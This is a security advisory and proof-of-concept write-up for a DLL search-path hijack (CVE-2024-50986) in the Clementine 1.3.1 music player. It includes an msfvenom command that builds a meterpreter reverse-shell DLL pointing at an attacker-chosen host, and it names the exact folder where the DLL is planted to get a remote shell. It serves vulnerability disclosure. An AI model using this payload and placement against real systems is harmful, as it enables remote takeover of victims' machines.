Description: An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.
Version Affected: Clementine v.1.3.1
Researcher: Utkarsh (r1971d3) LinkedIn
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Vulnerability Type: Untrusted Search Path
Affected Component: QUSEREX.DLL
Proof-of-Concept Exploit
Attack Vector
To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.
Description & Usage
- Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine is searching for them within the Windows Operating System
data:image/s3,"s3://crabby-images/d752e/d752e0e6ebe120368dfcbd2f3edb22e141db2a36" alt=""
- The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users<username>\AppData\Local\Microsoft\WindowsApps\
data:image/s3,"s3://crabby-images/86896/86896ca9fb1dfe1255318ac37164d715356ec7ff" alt=""
- A malicious DLL is created using msfvenom with the following command:
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL
data:image/s3,"s3://crabby-images/383ad/383ad23fc86e39e329c78a98d2915f7b7513ecc9" alt=""
- This malicious DLL is placed in the directory C:\Users<username>\AppData\Local\Microsoft\WindowsApps, where it is successfully loaded by Clementine.
data:image/s3,"s3://crabby-images/916ef/916ef14e9f684caef953bbd1a7fd9204962d2f72" alt=""
- Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the C:\Program Files (x86)\Clementine\projectm-presets directory on the target machine.
data:image/s3,"s3://crabby-images/fe60e/fe60ec9ffac3c41bd0b89bc8e2a9dfda9dca1486" alt=""
data:image/s3,"s3://crabby-images/02501/025012438654ab4b324c1e7a0cbaa21bc4bccb75" alt=""